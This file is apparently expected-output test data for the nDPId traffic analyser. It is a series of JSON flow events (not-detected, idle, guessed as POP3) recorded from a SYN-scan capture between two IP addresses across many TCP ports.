-00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1662,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":100,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":642,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059517,"flow_last_seen":1278275059517,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8292,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":918,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059896,"flow_last_seen":1278275059896,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":979,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060005,"flow_last_seen":1278275060005,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14441,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060389,"flow_last_seen":1278275060389,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058031,"flow_last_seen":1278275058031,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1312,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060490,"flow_last_seen":1278275060490,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":106,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":142,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058155,"flow_last_seen":1278275058155,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":14442,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058471,"flow_last_seen":1278275058471,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":763,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059675,"flow_last_seen":1278275059675,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":284,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275058595,"flow_last_seen":1278275058595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":8300,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00578{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":834,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059785,"flow_last_seen":1278275059785,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":109,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057677,"flow_last_seen":1278275057677,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00790{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"1":"Match by port"},"proto":"POP3","breed":"Unsafe","category":"Email"},"pop": {"user":"","password":""}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057820,"flow_last_seen":1278275057820,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00591{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275056276,"flow_last_seen":1278275056276,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1792,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061108,"flow_last_seen":1278275061108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00577{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275057478,"flow_last_seen":1278275057478,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":111,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00595{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00580{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061211,"flow_last_seen":1278275061211,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2160,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":465,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059096,"flow_last_seen":1278275059096,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00592{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00576{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1278275056340,"flow_last_seen":1278275056401,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":113,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059220,"flow_last_seen":1278275059220,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":2161,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060847,"flow_last_seen":1278275060847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00594{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","ndpi": {"proto":"Unknown","breed":"Unrated"}} -00579{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2011,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1657,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275060949,"flow_last_seen":1278275060949,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275079360,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 